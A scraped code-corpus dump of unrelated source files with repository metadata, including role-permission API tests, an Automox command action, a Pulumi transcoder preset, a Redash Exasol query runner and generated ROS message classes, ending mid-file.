client_v1.login(normal_user_with_role.login, "qwerty")
role_data = normal_user_with_role.role.make_api_structure()
role_data["data"]["permissions"] = {"api": ["edit_role"]}
response = client_v1.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
assert response.status_code == 403
response = sudo_client_v1.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
assert response.status_code == 200
role_data = response.json
response = client_v1.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
assert response.status_code == 403
role_data["data"]["permissions"]["api"].append("view_role")
response = sudo_client_v1.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
role_data = response.json
response = client_v1.put(
"/v1/role/{0}/".format(role_data["id"]), data=role_data
)
assert response.status_code == 200
def test_add_permission_to_delete_user(client_v1, sudo_client_v1, sudo_role,
normal_user_with_role, valid_request):
client_v1.login(normal_user_with_role.login, "qwerty")
response = sudo_client_v1.post("/v1/role/", data=valid_request)
model = response.json
response = client_v1.delete("/v1/role/{0}/".format(model["id"]))
assert response.status_code == 403
add_permission_to_user(
sudo_client_v1, normal_user_with_role,
{"api": ["view_role", "delete_role"]}
)
def test_delete_role_with_active_user(sudo_client_v1, normal_user_with_role):
role_data = normal_user_with_role.role.make_api_structure()
response = sudo_client_v1.delete("/v1/role/{0}/".format(role_data["id"]))
assert response.status_code == 400
normal_user_with_role.delete()
response = sudo_client_v1.delete("/v1/role/{0}/".format(role_data["id"]))
assert response.status_code == 200
| [
"sarkhipov@mirantis.com"
] | sarkhipov@mirantis.com |
0a27983665eca4c578a5013cd7157737e2c6dec8 | c9500ad778b8521aaa85cb7fe3239989efaa4799 | /plugins/automox/icon_automox/actions/run_command/action.py | c10f2f3ba76d3af402ecb5308a617e712b5da48f | [
"MIT"
] | permissive | rapid7/insightconnect-plugins | 5a6465e720f114d71b1a82fe14e42e94db104a0b | 718d15ca36c57231bb89df0aebc53d0210db400c | refs/heads/master | 2023-09-01T09:21:27.143980 | 2023-08-31T10:25:36 | 2023-08-31T10:25:36 | 190,435,635 | 61 | 60 | MIT | 2023-09-14T08:47:37 | 2019-06-05T17:05:12 | Python | UTF-8 | Python | false | false | 1,408 | py | import insightconnect_plugin_runtime
from .schema import RunCommandInput, RunCommandOutput, Input, Output, Component
# Custom imports below
class RunCommand(insightconnect_plugin_runtime.Action):
def __init__(self):
super(self.__class__, self).__init__(
name="run_command", description=Component.DESCRIPTION, input=RunCommandInput(), output=RunCommandOutput()
)
def run(self, params={}):
policy_id = params.get(Input.POLICY_ID)
command = params.get(Input.COMMAND)
command_payload = {"command_type_name": command}
# Craft command and argument based on inputs which vary based on command being run
if command == "InstallUpdate":
command_payload["args"] = params.get(Input.PATCHES)
elif command == "PolicyTest":
command_payload["command_type_name"] = f"policy_{policy_id}_test"
elif command == "PolicyRemediate":
command_payload["command_type_name"] = f"policy_{policy_id}_remediate"
self.logger.info(
f"Running {command_payload['command_type_name']} command with the following "
f"arguments: {command_payload.get('args', 'No arguments defined')}"
)
self.connection.automox_api.run_device_command(
params.get(Input.ORG_ID), params.get(Input.DEVICE_ID), command_payload
)
return {Output.SUCCESS: True}
| [
"noreply@github.com"
] | rapid7.noreply@github.com |
9a42e5f17ab99a99ebc15ec69c703a5a312f984f | 2c4648efe8c7e408b8c3a649b2eed8bb846446ec | /codewars/Python/8 kyu/ValidateCodeWithSimpleRegex/validate_code_test.py | 8aefdd9d13dd8eab5601b43efe0c1ecca12ebe4b | [] | no_license | Adasumizox/ProgrammingChallenges | 9d79bd1b0ce4794b576124f9874aabb86d5c0713 | 3630fcde088d7991e344eb1b84805e9e756aa1a2 | refs/heads/master | 2021-07-16T08:16:57.538577 | 2020-07-19T19:58:28 | 2020-07-19T19:58:28 | 190,159,085 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 755 | py | from validate_code import validate_code
import unittest
class TestValidateCodeWithSimpleRegex(unittest.TestCase):
def test(self):
self.assertEqual(validate_code(123), True)
self.assertEqual(validate_code(248), True)
self.assertEqual(validate_code(8), False)
self.assertEqual(validate_code(321), True)
self.assertEqual(validate_code(9453), False)
def test_rand(self):
from random import randint
validate_sol=lambda code: str(code)[0] in "123"
for _ in range(40):
code=int(str(randint(1,6))+str(randint(1,10**randint(1,9))))
self.assertEqual(validate_code(code), validate_sol(code), "It should work for random inputs too")
if __name__ == '__main__':
unittest.main() | [
"darkdan099@gmail.com"
] | darkdan099@gmail.com |
d5854818d5e3e6c8e2cdd670b2817f56b180997d | 2a67dc681af4c4b9ef7a8e18c2ff75377dc5b44f | /aws.elastictranscoder.Preset-python/__main__.py | 65842b4d7b1e0d1857cb2f1f1a92513b38482b13 | [] | no_license | ehubbard/templates-aws | e323b693a18234defe6bd56ffcc64095dc58e3a1 | 2ae2e7a5d05490078017fed6d132dcdde1f21c63 | refs/heads/master | 2022-11-17T13:53:14.531872 | 2020-07-10T21:56:27 | 2020-07-10T21:56:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,452 | py | import pulumi
import pulumi_aws as aws
# Sample AWS Elastic Transcoder preset: H.264/AAC mp4 output with PNG
# thumbnails and one configurable content watermark slot named "Test".
bar = aws.elastictranscoder.Preset("bar",
    # Audio: single stereo AAC track, 96 kbps at 44.1 kHz.
    audio={
        "audioPackingMode": "SingleTrack",
        "bitRate": 96,
        "channels": 2,
        "codec": "AAC",
        "sampleRate": 44100,
    },
    audio_codec_options={
        "profile": "AAC-LC",
    },
    container="mp4",
    description="Sample Preset",
    # Thumbnail extraction settings; "auto" keeps the source dimensions.
    thumbnails={
        "format": "png",
        "interval": 120,
        "maxHeight": "auto",
        "maxWidth": "auto",
        "paddingPolicy": "Pad",
        "sizingPolicy": "Fit",
    },
    # Video: H.264 at 1600 kbps, 16:9, keyframe at most every 240 frames.
    # NOTE(review): several numeric-looking values are deliberately strings —
    # the Elastic Transcoder API expects them as strings; keep them quoted.
    video={
        "bitRate": "1600",
        "codec": "H.264",
        "displayAspectRatio": "16:9",
        "fixedGop": "false",
        "frameRate": "auto",
        "keyframesMaxDist": 240,
        "maxFrameRate": "60",
        "maxHeight": "auto",
        "maxWidth": "auto",
        "paddingPolicy": "Pad",
        "sizingPolicy": "Fit",
    },
    video_codec_options={
        "ColorSpaceConversionMode": "None",
        "InterlacedMode": "Progressive",
        "Level": "2.2",
        "MaxReferenceFrames": 3,
        "Profile": "main",
    },
    # One watermark slot anchored bottom-right, at most 20% of frame size.
    video_watermarks=[{
        "horizontalAlign": "Right",
        "horizontalOffset": "10px",
        "id": "Test",
        "maxHeight": "20%",
        "maxWidth": "20%",
        "opacity": "55.5",
        "sizingPolicy": "ShrinkToFit",
        "target": "Content",
        "verticalAlign": "Bottom",
        "verticalOffset": "10px",
    }])
| [
"jvp@justinvp.com"
] | jvp@justinvp.com |
2e7a3c78dc70b3d8601a2cc34252103d8834c6d2 | 4da9c19d9839c670fda30a45a7e223da624eee4a | /Codechef Problem solutions/chef and happiness new.py | c2f55bca41451258e8ad08c4309a6725aa068313 | [] | no_license | JineshKamdar98/Codchef-Problem-Solutions | 3e1737669cc0657ccc224e06f800b587130f5787 | 4447679aa3fb45a2d57f93bf3f724f6223049506 | refs/heads/master | 2020-05-05T06:38:10.306619 | 2019-04-06T06:16:10 | 2019-04-06T06:16:10 | 179,795,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | for t in range(int(input())):
n=int(input())
a=list(map(int,input().split()[:n]))
a.sort()
index=[]
value=[]
f=0
for i in range(n-1,-1,-1):
if((a[i]-1) in index):
f=0
break
else:
index.append(a[i]-1)
value.append(a[i])
if(value.count(a[i])>1):
f=1
if(f==1):
print("Truly Happy")
else:
print("Poor Chef")
| [
"noreply@github.com"
] | JineshKamdar98.noreply@github.com |
29904bf7638508da99c3a12ea8f0679def218f3a | 4148260054c2cf4605dacb8bdef3605c82eca470 | /temboo/Library/Google/Picasa/AddCommentToPhoto.py | 8f14bfc24bb5d18a65fd905bcc1b74a6b9fa4d9f | [] | no_license | wimsy/actuarize-web | 0f23d5f00afe3d36d430621cdb497d2e64998416 | 5f43af3019da6fb08cafeec9ff0a89df5196b864 | refs/heads/master | 2021-03-12T19:38:21.887681 | 2012-12-19T01:13:50 | 2012-12-19T01:13:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,767 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# AddCommentToPhoto
# Adds a comment to a specified photo in Google Picasa.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
# Temboo-generated choreography wrapper; keep in sync with the SDK generator.
class AddCommentToPhoto(Choreography):
    """
    Create a new instance of the AddCommentToPhoto Choreography. A TembooSession object, containing a valid
    set of Temboo credentials, must be supplied.
    """
    def __init__(self, temboo_session):
        # The path string identifies this choreo inside the Temboo library.
        Choreography.__init__(self, temboo_session, '/Library/Google/Picasa/AddCommentToPhoto')

    def new_input_set(self):
        # Typed input container for this choreo's parameters.
        return AddCommentToPhotoInputSet()

    def _make_result_set(self, result, path):
        return AddCommentToPhotoResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        return AddCommentToPhotoChoreographyExecution(session, exec_id, path)
"""
An InputSet with methods appropriate for specifying the inputs to the AddCommentToPhoto
choreography. The InputSet object is used to specify input parameters when executing this choreo.
"""
class AddCommentToPhotoInputSet(InputSet):
    # NOTE: the Temboo generator places each description string *before* the
    # setter it documents; the first string below therefore also serves as the
    # class docstring. Preserved as generated.
    """
    Set the value of the AccessToken input for this choreography. ((optional, string) The access token retrieved in the last step of the Oauth process. Access tokens that are expired will be refreshed and returned in the Choreo output.)
    """
    def set_AccessToken(self, value):
        InputSet._set_input(self, 'AccessToken', value)
    """
    Set the value of the AlbumID input for this choreography. ((required, integer) The id of the album which contains the photo you want to add a comment to.)
    """
    def set_AlbumID(self, value):
        InputSet._set_input(self, 'AlbumID', value)
    """
    Set the value of the ClientID input for this choreography. ((required, string) The client id provided by Google.)
    """
    def set_ClientID(self, value):
        InputSet._set_input(self, 'ClientID', value)
    """
    Set the value of the ClientSecret input for this choreography. ((required, string) The client secret provided by Google.)
    """
    def set_ClientSecret(self, value):
        InputSet._set_input(self, 'ClientSecret', value)
    """
    Set the value of the Comment input for this choreography. ((required, string) The comment that you want to add to a photo.)
    """
    def set_Comment(self, value):
        InputSet._set_input(self, 'Comment', value)
    """
    Set the value of the PhotoID input for this choreography. ((required, integer) The id of the photo you want to add a comment to.)
    """
    def set_PhotoID(self, value):
        InputSet._set_input(self, 'PhotoID', value)
    """
    Set the value of the RefreshToken input for this choreography. ((required, string) The refresh token retrieved in the last step of the OAuth process. This is used when an access token is expired or not provided.)
    """
    def set_RefreshToken(self, value):
        InputSet._set_input(self, 'RefreshToken', value)
    """
    Set the value of the UserID input for this choreography. ((optional, string) Google Picasa username. Defaults to 'default' which means the server will use the UserID of the user whose access token was specified.)
    """
    def set_UserID(self, value):
        InputSet._set_input(self, 'UserID', value)
"""
A ResultSet with methods tailored to the values returned by the AddCommentToPhoto choreography.
The ResultSet object is used to retrieve the results of a choreography execution.
"""
class AddCommentToPhotoResultSet(ResultSet):
    # NOTE: as with the input set, the generator puts each description string
    # *before* the getter it documents; the first doubles as the class docstring.
    """
    Retrieve the value for the "AccessToken" output from this choreography execution. ((optional, string) The access token retrieved in the last step of the Oauth process. Access tokens that are expired will be refreshed and returned in the Choreo output.)
    """
    def get_AccessToken(self):
        return self._output.get('AccessToken', None)
    """
    Retrieve the value for the "Response" output from this choreography execution. ((xml) The response from Google Picasa.)
    """
    def get_Response(self):
        return self._output.get('Response', None)
class AddCommentToPhotoChoreographyExecution(ChoreographyExecution):
    # Wraps a raw execution response in the typed AddCommentToPhotoResultSet.
    def _make_result_set(self, response, path):
        return AddCommentToPhotoResultSet(response, path)
| [
"mike.wimsatt@gmail.com"
] | mike.wimsatt@gmail.com |
2c683ab4db0dca1536a5101026e78e0f0ce3d233 | 707287238a36b8e5f3e26c347cca580549b441e5 | /combgen/linexts/pruesse_ruskey/coroutine/gen_all_no_sign.py | 9c51d769c4821cbf0a96ea4b8610985ba7f55d44 | [] | no_license | sahands/coroutine-generation | 2a01e3c5a36fc6b82d8087a15591a452e4bca636 | f0b318016b8925b2ab16640a588210548f7989db | refs/heads/master | 2016-09-06T04:54:02.453166 | 2015-01-06T21:32:58 | 2015-01-06T21:32:58 | 17,954,406 | 8 | 3 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | from .gen_all import gen_all
def gen_all_no_sign(n, poset, a_b_pairs):
    """Yield every other (even-indexed) extension produced by gen_all,
    dropping each extension's first element."""
    emit = True
    for ext in gen_all(n, poset, a_b_pairs):
        if emit:
            yield ext[1:]
        emit = not emit
| [
"sahands@gmail.com"
] | sahands@gmail.com |
f742b40048d600de11e340648eb9e41f0de18b24 | adde5784379cba18934bc32bd779959ccc8bc94f | /redash/query_runner/exasol.py | 790fb7d7475c18e969c6cb22d50a6751c0be4eae | [
"BSD-2-Clause"
] | permissive | YuanlvCold/mxzz-bi | 32292a8cafb4097fcb60e70917849a2f23e5511f | 7cae1b80e2f715d0af7ca912d1793668353c4b9e | refs/heads/master | 2022-12-02T04:39:06.631341 | 2020-08-17T06:46:19 | 2020-08-17T06:46:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,668 | py | import datetime
from redash.query_runner import *
from redash.utils import json_dumps
def _exasol_type_mapper(val, data_type):
if val is None:
return None
elif data_type["type"] == "DECIMAL":
if data_type["scale"] == 0 and data_type["precision"] < 16:
return int(val)
elif data_type["scale"] == 0 and data_type["precision"] >= 16:
return val
else:
return float(val)
elif data_type["type"] == "DATE":
return datetime.date(int(val[0:4]), int(val[5:7]), int(val[8:10]))
elif data_type["type"] == "TIMESTAMP":
return datetime.datetime(
int(val[0:4]),
int(val[5:7]),
int(val[8:10]), # year, month, day
int(val[11:13]),
int(val[14:16]),
int(val[17:19]), # hour, minute, second
int(val[20:26].ljust(6, "0")) if len(val) > 20 else 0,
) # microseconds (if available)
else:
return val
def _type_mapper(data_type):
    """Map an EXASOL column type descriptor to the matching redash TYPE_* constant."""
    kind = data_type["type"]
    if kind == "DECIMAL":
        if data_type["scale"] == 0:
            # Narrow exact integers are reported as integers; very wide ones
            # are surfaced as strings (mirrors _exasol_type_mapper).
            return TYPE_INTEGER if data_type["precision"] < 16 else TYPE_STRING
        return TYPE_FLOAT
    if kind == "DATE":
        return TYPE_DATE
    if kind == "TIMESTAMP":
        return TYPE_DATETIME
    return TYPE_STRING
try:
import pyexasol
enabled = True
except ImportError:
enabled = False
class Exasol(BaseQueryRunner):
    # Cheap statement used as a connectivity probe (BaseQueryRunner convention).
    noop_query = "SELECT 1 FROM DUAL"

    @classmethod
    def configuration_schema(cls):
        # JSON schema driving the data-source configuration form.
        return {
            "type": "object",
            "properties": {
                "user": {"type": "string"},
                "password": {"type": "string"},
                "host": {"type": "string"},
                "port": {"type": "number", "default": 8563},
                "encrypted": {"type": "boolean", "title": "Enable SSL Encryption"},
            },
            "required": ["host", "port", "user", "password"],
            "order": ["host", "port", "user", "password", "encrypted"],
            "secret": ["password"],
        }

    def _get_connection(self):
        # Open a pyexasol websocket connection; fetch_mapper converts raw wire
        # values to native Python via _exasol_type_mapper.
        exahost = "%s:%s" % (
            self.configuration.get("host", None),
            self.configuration.get("port", 8563),
        )
        return pyexasol.connect(
            dsn=exahost,
            user=self.configuration.get("user", None),
            password=self.configuration.get("password", None),
            encryption=self.configuration.get("encrypted", True),
            compression=True,
            json_lib="rapidjson",
            fetch_mapper=_exasol_type_mapper,
        )

    def run_query(self, query, user):
        # Execute `query` and return (json_data, error). `error` is always
        # None here: failures propagate as exceptions to the caller, while the
        # finally block still releases the statement and connection.
        connection = self._get_connection()
        statement = None
        error = None
        try:
            statement = connection.execute(query)
            columns = [
                {"name": n, "friendly_name": n, "type": _type_mapper(t)}
                for (n, t) in statement.columns().items()
            ]
            cnames = statement.column_names()
            rows = [dict(zip(cnames, row)) for row in statement]
            data = {"columns": columns, "rows": rows}
            json_data = json_dumps(data)
        finally:
            if statement is not None:
                statement.close()
            connection.close()
        return json_data, error

    def get_schema(self, get_stats=False):
        # Build {"schema.table": {"name": ..., "columns": [...]}} from the
        # EXA_ALL_COLUMNS system view and return its values.
        query = """
        SELECT
            COLUMN_SCHEMA,
            COLUMN_TABLE,
            COLUMN_NAME
        FROM EXA_ALL_COLUMNS
        """
        connection = self._get_connection()
        statement = None
        try:
            statement = connection.execute(query)
            result = {}
            for (schema, table_name, column) in statement:
                table_name_with_schema = "%s.%s" % (schema, table_name)
                if table_name_with_schema not in result:
                    result[table_name_with_schema] = {
                        "name": table_name_with_schema,
                        "columns": [],
                    }
                result[table_name_with_schema]["columns"].append(column)
        finally:
            if statement is not None:
                statement.close()
            connection.close()
        return result.values()

    @classmethod
    def enabled(cls):
        # True only when the optional pyexasol dependency imported successfully.
        return enabled


register(Exasol)
| [
"2426548297@qq.com"
] | 2426548297@qq.com |
9f9ad3e97589ce06abe60f4f50a7a25348e188fb | 0f0a0d5672bf40438d68ad523f484da0760407e8 | /Intro to Tensorflow/regression.py | 09dcf16265433ca238162899742a45f9e63ad631 | [
"MIT"
] | permissive | ITSJKS/100-Days-of-ML-Code | 45b3c4873df7e8684308003b8cc860a08000e11b | 677d8d6a19ae63d3aa2ddd74e9ce8ae7a06b71df | refs/heads/master | 2023-04-14T06:22:04.196837 | 2019-01-21T07:58:59 | 2019-01-21T07:58:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Sep 22 19:01:05 2018
Tensorflow implementation of the iris dataset classification
@author: Vishal
"""
#Using a linear classifier
import tensorflow.contrib.learn as tf
from sklearn import datasets, metrics
iris = datasets.load_iris()
clf = tf.TensorFlowLinearClassifier(n_classes=3)
clf.fit(iris.data, iris.target)
acc = metrics.accuracy_score(iris.target, clf.predict(iris.data))
print(f'{acc}')
#Using a linear regressor
import tensorflow.contrib.learn as tf
from sklearn import datasets, metrics, preprocessing, cross_validation
iris = datasets.load_iris()
scaler = preprocessing.MinMaxScaler()
features = scaler.fit_transform(iris.data)
labels = iris.target
features_train, features_test, labels_train, labels_test = cross_validation.train_test_split(features, labels, test_size=0.3, random_state=42)
clf = tf.TensorFlowLinearRegressor()
clf.fit(features_train, labels_train)
accuracy = metrics.accuracy_score(labels_test, clf.predict(features_test))
print(f'{acc}') | [
"vishal114186@gmail.com"
] | vishal114186@gmail.com |
765b1ab039eeab0f545d9ebe0eaed5446fb91029 | a3acbac8cc1ab10ebd6459d5204459a31d5ca77a | /re_2dmap_extractor/src/re_2dmap_extractor/srv/_RequestLocMap.py | d92a36d12b3d2b31a2716dceebc8d47e870372b0 | [] | no_license | flavoi/roboearth | 970904486b385a9930ac853f13bbf8e82f48288d | 517a611c2531781dea7835c1cd2d80ff7e143638 | refs/heads/master | 2020-04-10T00:30:55.822173 | 2017-12-28T11:35:42 | 2017-12-28T11:35:42 | 6,952,511 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 14,206 | py | """autogenerated by genpy from re_2dmap_extractor/RequestLocMapRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import re_msgs.msg
class RequestLocMapRequest(genpy.Message):
  # Generated by genpy from the RequestLocMap service definition — do not
  # hand-edit; change the .srv/.msg files and regenerate instead.
  _md5sum = "a31bdc686743a8e0baa91632efca1e98"
  _type = "re_2dmap_extractor/RequestLocMapRequest"
  _has_header = False #flag to mark the presence of a Header object
  _full_text = """re_msgs/RosFile octoMap
float64 z
string targetMapName
================================================================================
MSG: re_msgs/RosFile
# This file representation is used to pass binary data to the RoboEarthDB.
# As the endianess isn't stored, only files with a byte order mark (BOM) or
# an implicitly specified endianess should be transferred.
string name # file name
int8[] data # binary data
"""
  __slots__ = ['octoMap','z','targetMapName']
  _slot_types = ['re_msgs/RosFile','float64','string']

  def __init__(self, *args, **kwds):
    """
    Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommend
    use is keyword arguments as this is more robust to future message
    changes. You cannot mix in-order arguments and keyword arguments.
    The available fields are:
       octoMap,z,targetMapName
    :param args: complete set of field values, in .msg order
    :param kwds: use keyword arguments corresponding to message field names
    to set specific fields.
    """
    if args or kwds:
      super(RequestLocMapRequest, self).__init__(*args, **kwds)
      #message fields cannot be None, assign default values for those that are
      if self.octoMap is None:
        self.octoMap = re_msgs.msg.RosFile()
      if self.z is None:
        self.z = 0.
      if self.targetMapName is None:
        self.targetMapName = ''
    else:
      self.octoMap = re_msgs.msg.RosFile()
      self.z = 0.
      self.targetMapName = ''

  def _get_types(self):
    """
    internal API method
    """
    return self._slot_types

  def serialize(self, buff):
    """
    serialize message into buffer
    :param buff: buffer, ``StringIO``
    """
    try:
      _x = self.octoMap.name
      length = len(_x)
      # Strings travel as length-prefixed UTF-8 (python3 vs unicode handles py2/py3).
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.octoMap.data)
      buff.write(_struct_I.pack(length))
      pattern = '<%sb'%length
      buff.write(struct.pack(pattern, *self.octoMap.data))
      buff.write(_struct_d.pack(self.z))
      _x = self.targetMapName
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
    except struct.error as se: self._check_types(se)
    except TypeError as te: self._check_types(te)

  def deserialize(self, str):
    """
    unpack serialized message in str into this message instance
    :param str: byte array of serialized message, ``str``
    """
    try:
      if self.octoMap is None:
        self.octoMap = re_msgs.msg.RosFile()
      end = 0
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.octoMap.name = str[start:end].decode('utf-8')
      else:
        self.octoMap.name = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      pattern = '<%sb'%length
      start = end
      end += struct.calcsize(pattern)
      self.octoMap.data = struct.unpack(pattern, str[start:end])
      start = end
      end += 8
      (self.z,) = _struct_d.unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.targetMapName = str[start:end].decode('utf-8')
      else:
        self.targetMapName = str[start:end]
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill

  def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
      _x = self.octoMap.name
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.octoMap.data)
      buff.write(_struct_I.pack(length))
      pattern = '<%sb'%length
      buff.write(self.octoMap.data.tostring())
      buff.write(_struct_d.pack(self.z))
      _x = self.targetMapName
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
    except struct.error as se: self._check_types(se)
    except TypeError as te: self._check_types(te)

  def deserialize_numpy(self, str, numpy):
    """
    unpack serialized message in str into this message instance using numpy for array types
    :param str: byte array of serialized message, ``str``
    :param numpy: numpy python module
    """
    try:
      if self.octoMap is None:
        self.octoMap = re_msgs.msg.RosFile()
      end = 0
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.octoMap.name = str[start:end].decode('utf-8')
      else:
        self.octoMap.name = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      pattern = '<%sb'%length
      start = end
      end += struct.calcsize(pattern)
      self.octoMap.data = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length)
      start = end
      end += 8
      (self.z,) = _struct_d.unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.targetMapName = str[start:end].decode('utf-8')
      else:
        self.targetMapName = str[start:end]
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
# Pre-compiled little-endian struct packers used by the request class above.
_struct_I = genpy.struct_I
_struct_d = struct.Struct("<d")
"""autogenerated by genpy from re_2dmap_extractor/RequestLocMapResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import re_msgs.msg
class RequestLocMapResponse(genpy.Message):
  # Generated by genpy from the RequestLocMap service definition — do not
  # hand-edit; change the .srv/.msg files and regenerate instead.
  _md5sum = "0cdfbb487eae2b1a99678f5623ad0e0e"
  _type = "re_2dmap_extractor/RequestLocMapResponse"
  _has_header = False #flag to mark the presence of a Header object
  _full_text = """bool success
re_msgs/RosFile locMap
re_msgs/RosFile locMeta
================================================================================
MSG: re_msgs/RosFile
# This file representation is used to pass binary data to the RoboEarthDB.
# As the endianess isn't stored, only files with a byte order mark (BOM) or
# an implicitly specified endianess should be transferred.
string name # file name
int8[] data # binary data
"""
  __slots__ = ['success','locMap','locMeta']
  _slot_types = ['bool','re_msgs/RosFile','re_msgs/RosFile']

  def __init__(self, *args, **kwds):
    """
    Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommend
    use is keyword arguments as this is more robust to future message
    changes. You cannot mix in-order arguments and keyword arguments.
    The available fields are:
       success,locMap,locMeta
    :param args: complete set of field values, in .msg order
    :param kwds: use keyword arguments corresponding to message field names
    to set specific fields.
    """
    if args or kwds:
      super(RequestLocMapResponse, self).__init__(*args, **kwds)
      #message fields cannot be None, assign default values for those that are
      if self.success is None:
        self.success = False
      if self.locMap is None:
        self.locMap = re_msgs.msg.RosFile()
      if self.locMeta is None:
        self.locMeta = re_msgs.msg.RosFile()
    else:
      self.success = False
      self.locMap = re_msgs.msg.RosFile()
      self.locMeta = re_msgs.msg.RosFile()

  def _get_types(self):
    """
    internal API method
    """
    return self._slot_types

  def serialize(self, buff):
    """
    serialize message into buffer
    :param buff: buffer, ``StringIO``
    """
    try:
      buff.write(_struct_B.pack(self.success))
      _x = self.locMap.name
      length = len(_x)
      # Strings travel as length-prefixed UTF-8 (python3 vs unicode handles py2/py3).
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.locMap.data)
      buff.write(_struct_I.pack(length))
      pattern = '<%sb'%length
      buff.write(struct.pack(pattern, *self.locMap.data))
      _x = self.locMeta.name
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.locMeta.data)
      buff.write(_struct_I.pack(length))
      pattern = '<%sb'%length
      buff.write(struct.pack(pattern, *self.locMeta.data))
    except struct.error as se: self._check_types(se)
    except TypeError as te: self._check_types(te)

  def deserialize(self, str):
    """
    unpack serialized message in str into this message instance
    :param str: byte array of serialized message, ``str``
    """
    try:
      if self.locMap is None:
        self.locMap = re_msgs.msg.RosFile()
      if self.locMeta is None:
        self.locMeta = re_msgs.msg.RosFile()
      end = 0
      start = end
      end += 1
      (self.success,) = _struct_B.unpack(str[start:end])
      self.success = bool(self.success)
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.locMap.name = str[start:end].decode('utf-8')
      else:
        self.locMap.name = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      pattern = '<%sb'%length
      start = end
      end += struct.calcsize(pattern)
      self.locMap.data = struct.unpack(pattern, str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.locMeta.name = str[start:end].decode('utf-8')
      else:
        self.locMeta.name = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      pattern = '<%sb'%length
      start = end
      end += struct.calcsize(pattern)
      self.locMeta.data = struct.unpack(pattern, str[start:end])
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill

  def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
      buff.write(_struct_B.pack(self.success))
      _x = self.locMap.name
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.locMap.data)
      buff.write(_struct_I.pack(length))
      pattern = '<%sb'%length
      buff.write(self.locMap.data.tostring())
      _x = self.locMeta.name
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.locMeta.data)
      buff.write(_struct_I.pack(length))
      pattern = '<%sb'%length
      buff.write(self.locMeta.data.tostring())
    except struct.error as se: self._check_types(se)
    except TypeError as te: self._check_types(te)

  def deserialize_numpy(self, str, numpy):
    """
    unpack serialized message in str into this message instance using numpy for array types
    :param str: byte array of serialized message, ``str``
    :param numpy: numpy python module
    """
    try:
      if self.locMap is None:
        self.locMap = re_msgs.msg.RosFile()
      if self.locMeta is None:
        self.locMeta = re_msgs.msg.RosFile()
      end = 0
      start = end
      end += 1
      (self.success,) = _struct_B.unpack(str[start:end])
      self.success = bool(self.success)
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.locMap.name = str[start:end].decode('utf-8')
      else:
        self.locMap.name = str[start:end]
